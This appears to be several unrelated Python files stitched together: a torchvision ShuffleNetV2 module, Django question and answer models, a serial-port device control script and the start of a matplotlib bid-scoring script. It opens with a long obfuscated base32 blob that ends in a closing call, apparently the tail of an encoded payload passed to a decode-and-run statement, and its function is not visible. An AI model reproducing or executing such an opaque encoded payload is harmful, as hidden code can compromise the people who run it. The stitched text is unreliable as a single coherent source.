NK4PBTDIULZLR4GINS7M5OFYXDYMQ2CYSC4PAYGENC4PAYTGXDYHBQVY6DGGZOHQOBVLR4DCY3GLR2EGXDYG5TFY6BQMNWUGXDYMVQVY6DDGZOHQMJWLR4GGNK4PA4WM7DZLR4GGYS4PBRDEXDYGA2UKRZRNROHQOJQLR4GGNK4PAYWIXDYHE3TAK24PA4TEXDYGBSVE2DXMZOHQZLDLR4GENKYLR4DQY24PBRWKXDYGA3FY6DBG5OHQODBNROHQZJSLR4GEOC6ENIVY6DFGZOHQMBXIZOHQZRVLR4GCNZALR4GEYS4PA4DMM24PBSGGPK4PBSTKXDYHE4FYXCULR4GMMK4PA4GIXDYGFSFCXDYMEYVY6DBMJOHQYJYKYSVY6BRMZRVY6DCGIWVY6DBG5OHQY3BLR4DSNBDLR4GCNC4PBRDMXDYHBTFY6BQGBOHQYJXHROHQZJULR4GMYK4PBSGEXDYMRRSSXDYMQ4VY6DDGFOHQZBQLR4GMNK4PBQTKU24E45EKXDYGFSSUUS4PBQWEXDYMM3VY6DBHFTUQXDOGJOHQYJTKROHQMBQLR4GGOCMLR4GEMKULR4GEOK4PAYWIXDYMRTFY6BRGBOHQZBTLR4GGNS4PBRTQPK4PAYDKXDYMQ2VY6DBMVOFYPK4PBSDEXDYME3VY6BRMI3CQXDSNFYCMXDYMEZVY4TJMFOHQZBZLR4DSYS4PBRWCLCDLR4GMN2ULR4DSMK4PBQTEXDYMM2VY6DGMNOHQMBRJFCVY6BQGN6VY6BYMZOHQYRYLR4GGY24PBRDOXDYHFSFY6BQMNPTIXDYMI4FY6BYME7HSXDYGEZVY6BYHA4CMXDYMM4GGU24PBQTK5K4PBSDSZ24PBTDGXDYMZRVY3S4PAYDQX25MJOHQYZZEBGVY6BQGNOHQOLDLR4GCN24PAYWKXDYMRSVY6BYG5OHQYJULR4DQZS4PBRDKXDYHEZSKXDYGE4W6MC4PBRGCXDYMFQVY6DCGFOHQYTDLR4GMOJQJZGTQXDYMJSVY6BQMURFY6DFMU7FAXDYMRRW6XDYMRRFY6DGMJGHUNLJLR4DCMK4PAYDEXDYMMZFY6DCGFGVY6DEMRKHGXDYGA4FY6BZG5OHQMJXLR4DQYRYLR4GKOC4PBRWKXDYMY4VY6DDMFGVY6BQMNOHQYJWEV5FY6DBGZOHQN3GLR4GEOC4PBRTAZ24PBQWKXDYMRQW4XDYMY2FY6BZMNBDOXDYMM4FY6DBGVOHQOBYLR4DSMC4PBTDEXDYMUZFY6BZMJOHQODBLR4DQYK4PBTGIXDYGFRHSXDYMM4VY6DFGE5FY6BZMROHQYLEMFOHQZJXLR4DAMJKLR4GGOJOLR4GKNC4PBTGGXDYG5TFY6DBMU2G6XDYHEYFY6BRGJOHQOJRLR4GGZC4PA4TAXDSPVJVYJ24OJOHQYRTLR4GIMK4PBSDKXDYGFTF2XDYMJSFY6DGMZUDQXDYMUZEOXDYMVRE6YS4PA4DQXDYGBSVY6DFHFOHQYRYLR4GCOC4PBRGGXDYMZRSEL24PBSTEXDYMEYVY6BZGVOHQZBRLR4GMMLFIROHQODCGBYFY6DDGJOHQMJSLR4DSN24PBSTOSS4PBRDI7CZJROHQZRZLR4GIMK4PAYDCXDYMJRF2XDYMNSHAXL3I5OHQYJZLR4GENK4PBSDGXDYMQ2FY6BQMJOHQOJXLR4DSYK4PA4TMZC4PBSTGXDYMVSSMXDYME3FY6BYGNOHQZLFO54DQXS4OROHQZRULR4GMZS4PBTGEXDYMMYFY6DEGJOHQYLCLR4DSOC4PBTGKIS4PA4TCXDYHE3DORLGLR4DCYK4PBRTCWJVLR4DSM24PBRGGXDYMZRVSXDYMJQVY6DDMJQVY6BQMJOHQZLELROEQLK4PAYGKXK4PBQWKXDYMFQVY6BQMZOHQY3CLR4GCYS4PAYTQUTFLR4GEM24PBRWMXDYHBQVY6DCGN2FY6BYHFOHQZDGLR4GGMZGLR4DQZDULR4GMNS4PA4DC4K4PBSDSXDYMY2FY6BQMVOHQOJULR4DQNC4PBRWKXDYHFQVY6BRMZOHQYJTLR4DQOK4PBSTQ524PBRWKXDYMEYVY6DDG5OHQZDELR4DSNC4PBSGMXDYHFTFY6BYMJOHQZLDLQTVY6DFGRZV4T24PAYDGXDYMVTFY6DCGJOHQODFMFOHQZJWLR4GGOK4PA4GEZJQLR4DSY24PBRGCXDSLR4DQNSULR4GENTLLR4GGYK4PBRTOOC4PBSTOXDYMQZVY6DGGFOHQOJRLR4GMYKCLR4DSNS4PA4DAXDYMQZVY6BRGFOHQMBSLR4GGZC4PBTDOM24PBRWGXDYMY2FYXC4PBTGKXDYHBRGGO3RLR4DCZK4PA4GGXDYHBSFY6DGMFRVY6DCMJOHQOLCLR4DCYLBLZOHQOJXLR4DQNC4PBRDSXDYHFRE4OZVFVOHQZJRIJOHQYZWLR4GCNCOLR4GMYK4PA4WCXDYGFRFY6DBGMVVY6BYGZOHQOJSLR4DQNS4PBSWCRS6LR4DQN3ILR4GMNLWNFOHQYLELR4GMNSJN5OHQYZTMROHQMJVLR4GEOK4PBRWK324PBRDGXDYME2FY6DDGJOHQZTCLR4DCNK4PAYWKXDYMM2CUXDYHBSC2XDSLNOHQZJUJZOHQZLBO4XW2TDELR4DOZS4PBSTIOS4PA4TOXDYMQ4FKOJOLR4DQOK4PBSGMRL2LR4DQZC4PBRDGIC4PBQTC3S4PBRTMXDYMJTFY6BRGJOHEVSWLR4DSNK6LR4GMZJRMROHQOJQOVMFY6DBG5OHQZRTJNOHQOLCLR4GCOK4PBRTCMBQLR4DSN2INV2U2XDYGE4VY6BQGNRHUXDYMU3FY6DFHFOHQYZRLBOHQMBVLR4GCOC4PA4TA63QLR4DSOKWLBOHQZBVLR4DSMC4PA4WGXDYGFQT6XDYMY3C2XDYMRTFY6BYGBWVEXDYMJRFY6DBGFOHQOJZLR4GEMDEMZOHQZRTGNOHQYRQJVOHQZLBLR4GCNK4PBQTKXDYMYZUCXDYHAZVY6DBGFOHQYJTNUSVY6BZGNOHQZBVLR4GGYS4PA4GCXDYMEZVY6BYGZOHQZRQLR4DSNS4PBSGKXDYMFSVY6BRGVOHQZBVLR4GKNC4OQYFY6BRMJOHQODGLR4DQMSPLR4GIZK4PBRGKXDOINOHQYTFLR4GCMS4PBSDCXDYMQYFY6DCGZOXI4S4PBRGGXDYME4VY6BQGROHQOLFLQTS6XDYHBSUAK3JF54VY6BZG5OHQOJXLVJVY6BRHFBFY6BQHBFGCXDYMY4CEXDYHA3FY6BZGZOHQYRYLR4GMYK4PBQWCXDYMMYSWXDYMU3VY6BRGNSGYXDYGFTFY6DDMJOHQOJZLR4GEMK4PBTGGMTOLR4DCOC4PAYTGXDYGFRVY6BQGVOHQODBLR4DANC4PAYGM4BWPFJVY6BRGBOHQYLGN5OHQYTBNJBWOXDYHA2VY6DEGJKGA6S4PBRDMXDYMQYESXDYGA3VY6BZMFOHQODFNVOHQZJVLR4GENJMLR4DCYJSLR4DSNBTLJOVY6DFGZOHQZRYLQTVY6DBGROHQZLFLR4GCZBKLR4DANS4PBSGCXDYHAZVY6DEGNOHQOBXLR4GKNTAKNOHQZJZLR4DQYTPFZOHQMLENNOHQYLDJJOHQZRZLR4DSOJALRXFY6BRMRFWMXDYHAYVY6DFGROHQMJVLR4GIMS4PBTGCXDYMU2VY6BQGRKVY6DFGBOHQOJVLR4GKYSJLR4GMYS4PBSDS2C4PA4DOXDYMM2VY6DEGFTSIXDYMVTFY6BRGNOHQYTBLR4GIMK4PBQWIXDOGJOHQYRYLR4DSZBJLR4DQM3SLR4GEMS4PBTDQZ24PBTDIXDYGFTC2XDYHFRFY6BRG5OHQZBWEUZFY6DGGVOHQOLBLR4DSZC4PAYTA624PAYTAXDYMU3FY6BZMQRFY6DEGE2VY6DFHBMWAJC4PBRDIXDYGFRVY6DCGBOHQOJZLR4DSY24PA4WI7S4PAYWGXDYMQZDKX2GFROHQMBYLR4DCZTPLR4GIZK4PA4DMXDYGA3FY6DGGB3HAXDYGBRVY6DBGQRVY6BQGJOHQODBLR4DSNCFLR4GIMDQLQTVY6DGGF7FY6DGGBOHQOBQMBOHQOJTLR4GCNS4PBQTAVZFLR4GMYK4NZOHQYRVMZKGW3JZPZOHQY3BLROFY6BYHFBVY6DDGJOHQZJVLR4GEYS4PBSTMXDYHFRVY6DBGFOHQZJXKROHQYJSLBOHQZRYLR4GGZK4PBSTMXDYMRSFY6BQG5OHQMDCLR4GCMS4PA4TMXDYMIZVY6DBHBOHQOJXO5OHQOJXKNOHQZJTLR4DSNBDJN4E2V24PBQWGJS4PAYGGY3HFFOHQYTEJMSFY6DEHBOHQYJRLR4GMOK4LQUFY6DBGROHQZLCH5OHQZBWLR4DQYTZLR4DSMCGLR4GGOC4PA4WMXDYMVQVY6BYG5OHQYJSLR4DSNSWLNOHQOLELR4GCMS4PBSTCXDYGAYVY6DGMFOHQOLFOZ6FY6BQGROHQOBUJVOHQOBZLR4GCY24PBSTGXDYGA4CAXDYMQ2C6XDYMNSVY6DCGROHQYRZLR4DSNK4PA4TGXDYMRTFY6DDMJOHQYTCLR4GCY3WLR4DAZJPLR4GEMTLLR4GCNKHLR4DSN3OLR4DCMR2KVOHQMJYIVOHQY3CLR4DOZS4PAYTGXDYMEYFORDCLR4GGYK4PBQTM624PAYWKPS4PBQTIXDYHA4VY6DFMVOHQOJULR4GGOC5LR4GCOK4PBRTKZLILR4GGNS4PBSWKXDYMFQVY6DFGR5VY6BQHBOHQZJXIE3VY6DEGJFXAIL4H5OHQZJSLR4DAYSHLR4DCMS4PAYTIXK4PBRDQXDYHE4VY6DDHBOHQMDFGJPCQXDYHE4XSXDYMU2VY6BQGVOHQOJTKJOHQOJZMBOHQYZXNQTFY6BZMROHQMJYLR4GGOK4PBQWGQ24PBRTKNK4LRUFY6DEGNOHQODDEIYXCXDYMJRVY6BRGFOHQZDCPFOHQYJZJZOHQYLGLR4DQZS4PBQWKXS4PBRTA224PAYDMXDYHBRDYXDYMI3VY6BRGROHQMJYLR4DAOD6LR4DSOK4PBRDQXDYMEYHGXDYMU2VY6DGMFOHQYJXLR4DQYS4PA4GCXDYMMZFY6DEGJOHQZTCFFHVY6BXMZYEQXDYHE4VY4S4PA4WKJK4PBQWG6K4PBRGGXDYMZSG4XDYMY2FY6DGMZOHQOLBLR4DCM2XLR4GMY24PBRDSXC4LR4DSYS4PBRWMXDYGEZHKXDYMZQVY6DCGVDSUWK4PBRDCVZDLR4GCZDZJZOHQOBQLR4DCM3KMZOHQOLDLR4DSZDVLR4GMNK4PBSTELDRKBOHQZJRLR4DSYS4PA4DKJRDLR4GEY24PAYDAKK4PAYDIW3TLR4GCNK4PBRGMXDYMQ2FY6DDG5OHQMLDJ5WVY6DGMFOHQYZYLR4DSOK4PBSTQXDYHFRVY3S4PAYTGXDYHE2VY6BZMVOHQYTGLR4GMNC4PBTGEXDYMMYVY6DBGZOHQZJRLR4GGYK4PBRTEXDYGA2FQYJ2PFOHQZBRLR4GKN24PAYTAXDYHBRH2XDYHA2TMXDYMI3VY6BZHFOHQYTDLR4DQM24PBRGIQK4PBTDGXDYHA3FY6DEHFZW2XDYMVQVY6DGHFOHQOJQLR4GGYK4PBTGEXDYHBTFAXDYMMYSGOC4PBRDI5C4PBSWKTS4PBRWMXDYMM3VY6BQMNZFY6DCHBOHQOJVNVOHQMJZIBOHQYJULR4GIOK4PBRTEXDYMMYVY6BRMROHQYRTOYRVY6BRMROHQZDFOVOHQZJVLR4DQZKILR4GKNK5LR4GGNS2LR4GCOC4PBSTMYCDLR4GKMC4E5OHQMJQMBOHQYZULR4GCMK4PBSWKT24PA4WK7C4LROHQYTBOVOHQZLCLR4GMZS4PAYDAXDYMY3VY6DEGF5E4KC4PAYDEXDYGAYFY6BQGBOHQMBQOROHQMBULR4DAMC4PAYDAXDYGAYHU3DJMJ2FY3S4PAYDAXDYGAYFY6BQGBSGKY3PNVYHEZLTOMUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYHGXDYGA2VY6BQGBOHQMBQLR4DAMCTMF5HQ5DULR4DAOC4PAYDAXDYGAYFY6BQGA6G233EOVWGKPS4PAYDIXDYGAYFY6BQGBOHQMBQONOHQMBSLR4DAMC4PAYDAXDYGAYFY6BQMNOHQMBRE4UQ===="))
|
from functools import partial
from typing import Any, Callable, List, Optional
import torch
import torch.nn as nn
from torch import Tensor
from ..transforms._presets import ImageClassification
from ..utils import _log_api_usage_once
from ._api import register_model, Weights, WeightsEnum
from ._meta import _IMAGENET_CATEGORIES
from ._utils import _ovewrite_named_param, handle_legacy_interface
__all__ = [
"ShuffleNetV2",
"ShuffleNet_V2_X0_5_Weights",
"ShuffleNet_V2_X1_0_Weights",
"ShuffleNet_V2_X1_5_Weights",
"ShuffleNet_V2_X2_0_Weights",
"shufflenet_v2_x0_5",
"shufflenet_v2_x1_0",
"shufflenet_v2_x1_5",
"shufflenet_v2_x2_0",
]
def channel_shuffle(x: Tensor, groups: int) -> Tensor:
batchsize, num_channels, height, width = x.size()
channels_per_group = num_channels // groups
# reshape
x = x.view(batchsize, groups, channels_per_group, height, width)
x = torch.transpose(x, 1, 2).contiguous()
# flatten
x = x.view(batchsize, num_channels, height, width)
return x
class InvertedResidual(nn.Module):
def __init__(self, inp: int, oup: int, stride: int) -> None:
super().__init__()
if not (1 <= stride <= 3):
raise ValueError("illegal stride value")
self.stride = stride
branch_features = oup // 2
if (self.stride == 1) and (inp != branch_features << 1):
raise ValueError(
f"Invalid combination of stride {stride}, inp {inp} and oup {oup} values. If stride == 1 then inp should be equal to oup // 2 << 1."
)
if self.stride > 1:
self.branch1 = nn.Sequential(
self.depthwise_conv(inp, inp, kernel_size=3, stride=self.stride, padding=1),
nn.BatchNorm2d(inp),
nn.Conv2d(inp, branch_features, kernel_size=1, stride=1, padding=0, bias=False),
nn.BatchNorm2d(branch_features),
nn.ReLU(inplace=True),
)
else:
self.branch1 = nn.Sequential()
self.branch2 = nn.Sequential(
nn.Conv2d(
inp if (self.stride > 1) else branch_features,
branch_features,
kernel_size=1,
stride=1,
padding=0,
bias=False,
),
nn.BatchNorm2d(branch_features),
nn.ReLU(inplace=True),
self.depthwise_conv(branch_features, branch_features, kernel_size=3, stride=self.stride, padding=1),
nn.BatchNorm2d(branch_features),
nn.Conv2d(branch_features, branch_features, kernel_size=1, stride=1, padding=0, bias=False),
nn.BatchNorm2d(branch_features),
nn.ReLU(inplace=True),
)
@staticmethod
def depthwise_conv(
i: int, o: int, kernel_size: int, stride: int = 1, padding: int = 0, bias: bool = False
) -> nn.Conv2d:
return nn.Conv2d(i, o, kernel_size, stride, padding, bias=bias, groups=i)
def forward(self, x: Tensor) -> Tensor:
if self.stride == 1:
x1, x2 = x.chunk(2, dim=1)
out = torch.cat((x1, self.branch2(x2)), dim=1)
else:
out = torch.cat((self.branch1(x), self.branch2(x)), dim=1)
out = channel_shuffle(out, 2)
return out
class ShuffleNetV2(nn.Module):
def __init__(
self,
stages_repeats: List[int],
stages_out_channels: List[int],
num_classes: int = 1000,
inverted_residual: Callable[..., nn.Module] = InvertedResidual,
) -> None:
super().__init__()
_log_api_usage_once(self)
if len(stages_repeats) != 3:
raise ValueError("expected stages_repeats as list of 3 positive ints")
if len(stages_out_channels) != 5:
raise ValueError("expected stages_out_channels as list of 5 positive ints")
self._stage_out_channels = stages_out_channels
input_channels = 3
output_channels = self._stage_out_channels[0]
self.conv1 = nn.Sequential(
nn.Conv2d(input_channels, output_channels, 3, 2, 1, bias=False),
nn.BatchNorm2d(output_channels),
nn.ReLU(inplace=True),
)
input_channels = output_channels
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
# Static annotations for mypy
self.stage2: nn.Sequential
self.stage3: nn.Sequential
self.stage4: nn.Sequential
stage_names = [f"stage{i}" for i in [2, 3, 4]]
for name, repeats, output_channels in zip(stage_names, stages_repeats, self._stage_out_channels[1:]):
seq = [inverted_residual(input_channels, output_channels, 2)]
for i in range(repeats - 1):
seq.append(inverted_residual(output_channels, output_channels, 1))
setattr(self, name, nn.Sequential(*seq))
input_channels = output_channels
output_channels = self._stage_out_channels[-1]
self.conv5 = nn.Sequential(
nn.Conv2d(input_channels, output_channels, 1, 1, 0, bias=False),
nn.BatchNorm2d(output_channels),
nn.ReLU(inplace=True),
)
self.fc = nn.Linear(output_channels, num_classes)
def _forward_impl(self, x: Tensor) -> Tensor:
# See note [TorchScript super()]
x = self.conv1(x)
x = self.maxpool(x)
x = self.stage2(x)
x = self.stage3(x)
x = self.stage4(x)
x = self.conv5(x)
x = x.mean([2, 3]) # globalpool
x = self.fc(x)
return x
def forward(self, x: Tensor) -> Tensor:
return self._forward_impl(x)
def _shufflenetv2(
weights: Optional[WeightsEnum],
progress: bool,
*args: Any,
**kwargs: Any,
) -> ShuffleNetV2:
if weights is not None:
_ovewrite_named_param(kwargs, "num_classes", len(weights.meta["categories"]))
model = ShuffleNetV2(*args, **kwargs)
if weights is not None:
model.load_state_dict(weights.get_state_dict(progress=progress, check_hash=True))
return model
_COMMON_META = {
"min_size": (1, 1),
"categories": _IMAGENET_CATEGORIES,
"recipe": "https://github.com/ericsun99/Shufflenet-v2-Pytorch",
}
class ShuffleNet_V2_X0_5_Weights(WeightsEnum):
IMAGENET1K_V1 = Weights(
# Weights ported from https://github.com/ericsun99/Shufflenet-v2-Pytorch
url="https://download.pytorch.org/models/shufflenetv2_x0.5-f707e7126e.pth",
transforms=partial(ImageClassification, crop_size=224),
meta={
**_COMMON_META,
"num_params": 1366792,
"_metrics": {
"ImageNet-1K": {
"acc@1": 60.552,
"acc@5": 81.746,
}
},
"_ops": 0.04,
"_file_size": 5.282,
"_docs": """These weights were trained from scratch to reproduce closely the results of the paper.""",
},
)
DEFAULT = IMAGENET1K_V1
class ShuffleNet_V2_X1_0_Weights(WeightsEnum):
IMAGENET1K_V1 = Weights(
# Weights ported from https://github.com/ericsun99/Shufflenet-v2-Pytorch
url="https://download.pytorch.org/models/shufflenetv2_x1-5666bf0f80.pth",
transforms=partial(ImageClassification, crop_size=224),
meta={
**_COMMON_META,
"num_params": 2278604,
"_metrics": {
"ImageNet-1K": {
"acc@1": 69.362,
"acc@5": 88.316,
}
},
"_ops": 0.145,
"_file_size": 8.791,
"_docs": """These weights were trained from scratch to reproduce closely the results of the paper.""",
},
)
DEFAULT = IMAGENET1K_V1
class ShuffleNet_V2_X1_5_Weights(WeightsEnum):
IMAGENET1K_V1 = Weights(
url="https://download.pytorch.org/models/shufflenetv2_x1_5-3c479a10.pth",
transforms=partial(ImageClassification, crop_size=224, resize_size=232),
meta={
**_COMMON_META,
"recipe": "https://github.com/pytorch/vision/pull/5906",
"num_params": 3503624,
"_metrics": {
"ImageNet-1K": {
"acc@1": 72.996,
"acc@5": 91.086,
}
},
"_ops": 0.296,
"_file_size": 13.557,
"_docs": """
These weights were trained from scratch by using TorchVision's `new training recipe
<https://pytorch.org/blog/how-to-train-state-of-the-art-models-using-torchvision-latest-primitives/>`_.
""",
},
)
DEFAULT = IMAGENET1K_V1
class ShuffleNet_V2_X2_0_Weights(WeightsEnum):
IMAGENET1K_V1 = Weights(
url="https://download.pytorch.org/models/shufflenetv2_x2_0-8be3c8ee.pth",
transforms=partial(ImageClassification, crop_size=224, resize_size=232),
meta={
**_COMMON_META,
"recipe": "https://github.com/pytorch/vision/pull/5906",
"num_params": 7393996,
"_metrics": {
"ImageNet-1K": {
"acc@1": 76.230,
"acc@5": 93.006,
}
},
"_ops": 0.583,
"_file_size": 28.433,
"_docs": """
These weights were trained from scratch by using TorchVision's `new training recipe
<https://pytorch.org/blog/how-to-train-state-of-the-art-models-using-torchvision-latest-primitives/>`_.
""",
},
)
DEFAULT = IMAGENET1K_V1
@register_model()
@handle_legacy_interface(weights=("pretrained", ShuffleNet_V2_X0_5_Weights.IMAGENET1K_V1))
def shufflenet_v2_x0_5(
*, weights: Optional[ShuffleNet_V2_X0_5_Weights] = None, progress: bool = True, **kwargs: Any
) -> ShuffleNetV2:
"""
Constructs a ShuffleNetV2 architecture with 0.5x output channels, as described in
`ShuffleNet V2: Practical Guidelines for Efficient CNN Architecture Design
<https://arxiv.org/abs/1807.11164>`__.
Args:
weights (:class:`~torchvision.models.ShuffleNet_V2_X0_5_Weights`, optional): The
pretrained weights to use. See
:class:`~torchvision.models.ShuffleNet_V2_X0_5_Weights` below for
more details, and possible values. By default, no pre-trained
weights are used.
progress (bool, optional): If True, displays a progress bar of the
download to stderr. Default is True.
**kwargs: parameters passed to the ``torchvision.models.shufflenetv2.ShuffleNetV2``
base class. Please refer to the `source code
<https://github.com/pytorch/vision/blob/main/torchvision/models/shufflenetv2.py>`_
for more details about this class.
.. autoclass:: torchvision.models.ShuffleNet_V2_X0_5_Weights
:members:
"""
weights = ShuffleNet_V2_X0_5_Weights.verify(weights)
return _shufflenetv2(weights, progress, [4, 8, 4], [24, 48, 96, 192, 1024], **kwargs)
@register_model()
@handle_legacy_interface(weights=("pretrained", ShuffleNet_V2_X1_0_Weights.IMAGENET1K_V1))
def shufflenet_v2_x1_0(
*, weights: Optional[ShuffleNet_V2_X1_0_Weights] = None, progress: bool = True, **kwargs: Any
) -> ShuffleNetV2:
"""
Constructs a ShuffleNetV2 architecture with 1.0x output channels, as described in
`ShuffleNet V2: Practical Guidelines for Efficient CNN Architecture Design
<https://arxiv.org/abs/1807.11164>`__.
Args:
weights (:class:`~torchvision.models.ShuffleNet_V2_X1_0_Weights`, optional): The
pretrained weights to use. See
:class:`~torchvision.models.ShuffleNet_V2_X1_0_Weights` below for
more details, and possible values. By default, no pre-trained
weights are used.
progress (bool, optional): If True, displays a progress bar of the
download to stderr. Default is True.
**kwargs: parameters passed to the ``torchvision.models.shufflenetv2.ShuffleNetV2``
base class. Please refer to the `source code
<https://github.com/pytorch/vision/blob/main/torchvision/models/shufflenetv2.py>`_
for more details about this class.
.. autoclass:: torchvision.models.ShuffleNet_V2_X1_0_Weights
:members:
"""
weights = ShuffleNet_V2_X1_0_Weights.verify(weights)
return _shufflenetv2(weights, progress, [4, 8, 4], [24, 116, 232, 464, 1024], **kwargs)
@register_model()
@handle_legacy_interface(weights=("pretrained", ShuffleNet_V2_X1_5_Weights.IMAGENET1K_V1))
def shufflenet_v2_x1_5(
*, weights: Optional[ShuffleNet_V2_X1_5_Weights] = None, progress: bool = True, **kwargs: Any
) -> ShuffleNetV2:
"""
Constructs a ShuffleNetV2 architecture with 1.5x output channels, as described in
`ShuffleNet V2: Practical Guidelines for Efficient CNN Architecture Design
<https://arxiv.org/abs/1807.11164>`__.
Args:
weights (:class:`~torchvision.models.ShuffleNet_V2_X1_5_Weights`, optional): The
pretrained weights to use. See
:class:`~torchvision.models.ShuffleNet_V2_X1_5_Weights` below for
more details, and possible values. By default, no pre-trained
weights are used.
progress (bool, optional): If True, displays a progress bar of the
download to stderr. Default is True.
**kwargs: parameters passed to the ``torchvision.models.shufflenetv2.ShuffleNetV2``
base class. Please refer to the `source code
<https://github.com/pytorch/vision/blob/main/torchvision/models/shufflenetv2.py>`_
for more details about this class.
.. autoclass:: torchvision.models.ShuffleNet_V2_X1_5_Weights
:members:
"""
weights = ShuffleNet_V2_X1_5_Weights.verify(weights)
return _shufflenetv2(weights, progress, [4, 8, 4], [24, 176, 352, 704, 1024], **kwargs)
@register_model()
@handle_legacy_interface(weights=("pretrained", ShuffleNet_V2_X2_0_Weights.IMAGENET1K_V1))
def shufflenet_v2_x2_0(
*, weights: Optional[ShuffleNet_V2_X2_0_Weights] = None, progress: bool = True, **kwargs: Any
) -> ShuffleNetV2:
"""
Constructs a ShuffleNetV2 architecture with 2.0x output channels, as described in
`ShuffleNet V2: Practical Guidelines for Efficient CNN Architecture Design
<https://arxiv.org/abs/1807.11164>`__.
Args:
weights (:class:`~torchvision.models.ShuffleNet_V2_X2_0_Weights`, optional): The
pretrained weights to use. See
:class:`~torchvision.models.ShuffleNet_V2_X2_0_Weights` below for
more details, and possible values. By default, no pre-trained
weights are used.
progress (bool, optional): If True, displays a progress bar of the
download to stderr. Default is True.
**kwargs: parameters passed to the ``torchvision.models.shufflenetv2.ShuffleNetV2``
base class. Please refer to the `source code
<https://github.com/pytorch/vision/blob/main/torchvision/models/shufflenetv2.py>`_
for more details about this class.
.. autoclass:: torchvision.models.ShuffleNet_V2_X2_0_Weights
:members:
"""
weights = ShuffleNet_V2_X2_0_Weights.verify(weights)
return _shufflenetv2(weights, progress, [4, 8, 4], [24, 244, 488, 976, 2048], **kwargs)
|
from django.db import models
from django.contrib.auth.models import User
from questions.managers import QuestionManager
from django.conf import settings
# Create your models here.
class TimeStamp(models.Model):
"""
Reusable Abstract Timestamp Model Class.
"""
created_at = models.DateTimeField(auto_now=True)
updated_at = models.DateTimeField(auto_now_add=True)
class Meta:
abstract = True
class Question(TimeStamp):
"""
Question model class.
"""
question = models.CharField(max_length=100)
asked_by = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
null=True, blank=True
)
is_answered = models.BooleanField(default=False)
objects = QuestionManager()
def __str__(self):
return self.question
def answered(self):
self.is_answered = True
self.save(update_fields=['is_answered'])
class Answer(TimeStamp):
"""
Answer model Class.
"""
question = models.ForeignKey(
Question,
on_delete=models.CASCADE
)
answer = models.TextField()
answer_by =models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
null=True, blank=True
)
def __str__(self):
return "{}".format(str(self.question))
|
import serial
from datetime import datetime
import json
with open('input.json') as doc:
data = json.load(doc)
U_ID = int(data['u_id'], 16)
#ser = serial.Serial('/dev/tty.usbserial-A601D97W') #For Mac
ser = serial.Serial('/dev/ttyUSB0') #For RPi
def connect(params):
mode = params[0]
dev_id = hex(int(params[1]))
ser.write(bytes.fromhex('7e'))
ser.write(mode.encode())
for i in range(0,12):
uid_byte = hex((U_ID >> 8*i) & 0xff)
try:
ser.write(bytes.fromhex(uid_byte[2:]))
except:
ser.write(bytes.fromhex('0'+uid_byte[2:]))
curr = datetime.now().second
while(ser.in_waiting == 0 and datetime.now().second < (curr + 2)):
pass
if(ser.in_waiting == 0):
ser.write(bytes.fromhex('00'))
print("No device visible")
return "Sorry! This device is not visible to me."
else:
l = int(ser.read().decode())
while(ser.in_waiting < l):
pass
ack = (ser.read()).decode()
if(ack == 'C'):
try:
#print(dev_id)
ser.write(bytes.fromhex(dev_id[2:]))
#print(bytes.fromhex(dev_id[2:]))
except:
#print("Reached here")
ser.write(bytes.fromhex('0'+dev_id[2:]))
#print(bytes.fromhex('0'+dev_id[2:]))
return "Connected"
ser.flush()
def light(params):
mode = params[0]
dev_id = hex(int(params[1]))
state = hex(int(params[2]))
ser.write(bytes.fromhex('7e'))
ser.write(mode.encode())
for i in range(0,12):
uid_byte = hex((U_ID >> 8*i) & 0xff)
try:
ser.write(bytes.fromhex(uid_byte[2:]))
except:
ser.write(bytes.fromhex('0'+uid_byte[2:]))
try:
ser.write(bytes.fromhex(dev_id[2:]))
except:
ser.write(bytes.fromhex('0'+dev_id[2:]))
try:
ser.write(bytes.fromhex(state[2:]))
except:
ser.write(bytes.fromhex('0'+state[2:]))
if(mode == "L"):
curr = datetime.now().second
while(ser.in_waiting == 0 and datetime.now().second < (curr + 2)):
pass
if(ser.in_waiting == 0):
print("Device",params[1],"disconnected.")
return "I can't seem to be abe to talk to device "+params[1]+" right now. Try again!"
else:
l = int(ser.read().decode())
while(ser.in_waiting < l):
pass
ack = (ser.read()).decode()
ser.flush()
print("Success")
return "Voila!"
else:
return "Voila!"
def disconnect(params):
mode = params[0]
dev_id = hex(int(params[1]))
ser.write(bytes.fromhex('7e'))
ser.write(mode.encode())
for i in range(0,12):
uid_byte = hex((U_ID >> 8*i) & 0xff)
try:
ser.write(bytes.fromhex(uid_byte[2:]))
except:
ser.write(bytes.fromhex('0'+uid_byte[2:]))
try:
ser.write(bytes.fromhex(dev_id[2:]))
except:
ser.write(bytes.fromhex('0'+dev_id[2:]))
curr = datetime.now().second
while(ser.in_waiting == 0 and datetime.now().second < curr + 2):
pass
if(ser.in_waiting == 0):
print("Device not found.")
return "I can't find this device."
else:
l = int((ser.read()).decode())
while(ser.in_waiting < l):
pass
data = (ser.read()).decode()
if(data == "D"):
return "Device disconnected"
def show(params):
mode = params[0]
dev_id = hex(int(params[1]))
state = hex(int(params[2]))
print(dev_id)
print(state)
ser.write(bytes.fromhex('7e'))
ser.write(mode.encode())
for i in range(0,12):
uid_byte = hex((U_ID >> 8*i) & 0xff)
try:
ser.write(bytes.fromhex(uid_byte[2:]))
except:
ser.write(bytes.fromhex('0'+uid_byte[2:]))
try:
print(bytes.fromhex(dev_id[2:]))
ser.write(bytes.fromhex(dev_id[2:]))
print("senttrial")
except:
ser.write(bytes.fromhex('0'+dev_id[2:]))
print("Sent except")
try:
ser.write(bytes.fromhex(state[2:]))
except:
ser.write(bytes.fromhex('0'+state[2:]))
curr = datetime.now().second
while(ser.in_waiting == 0 and datetime.now().second < curr + 2):
pass
if(ser.in_waiting == 0):
print("Device not found.")
return "I can't communicate with this device right now."
else:
l = int((ser.read()).decode())
while(ser.in_waiting < l):
pass
data = (ser.read()).decode()
if(data == "S"):
return "Here"
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider
import numpy as np
def calc_base(mb,mbc,opbs,opbe,opbc,bid_step,alpha):
x = np.arange(opbs,opbe,bid_step)
y = (x*opbc +mb*mbc)/(mbc+opbc)
y = (y*0.6 + 88)*(1-alpha/100)
return x,y
def calc_score(my_offer,base):
temp = (my_offer - base)*100/base
for i in range(len(temp)):
if temp[i]<0:
